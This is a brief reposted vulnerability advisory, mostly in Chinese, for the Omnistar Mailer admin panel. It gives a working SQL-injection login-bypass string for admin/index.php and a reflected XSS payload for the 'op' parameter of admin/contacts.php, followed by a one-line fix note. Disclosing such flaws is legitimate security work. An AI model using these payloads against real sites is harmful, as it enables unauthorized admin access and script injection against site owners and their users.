来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 标题: Omnistar Mailer SQLi Vulnerability开发者官网: http://www.omnistarmailer.com/ www.2cto.com作者: Sid3^effects aKa HaRi shell_c99[at]yahoo.com描述:Are you a business and your ......
|
标题: Omnistar Mailer SQLi Vulnerability 开发者官网: http://www.omnistarmailer.com/ www.2cto.com 作者: Sid3^effects aKa HaRi <shell_c99[at]yahoo.com> 描述:
Are you a business and your are looking to increase your profit? Omnistar mailing list software will
allow you to send campaigns and professional html emails to your customers and potential customers in no time at all.
1.管理验证缺陷
万能密码:' or 1=1 or ''='
测试URL http://www.2cto.com /mailerd4/admin/index.php
2.XSS
Attack pattern :"><script>alert("Sid3^effects")</script>
测试url :http://www.2cto.com /mailerd4/admin/contacts.php?op=[xss]
修复:加强验证,过滤
# 0day no more # Sid3^effects |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
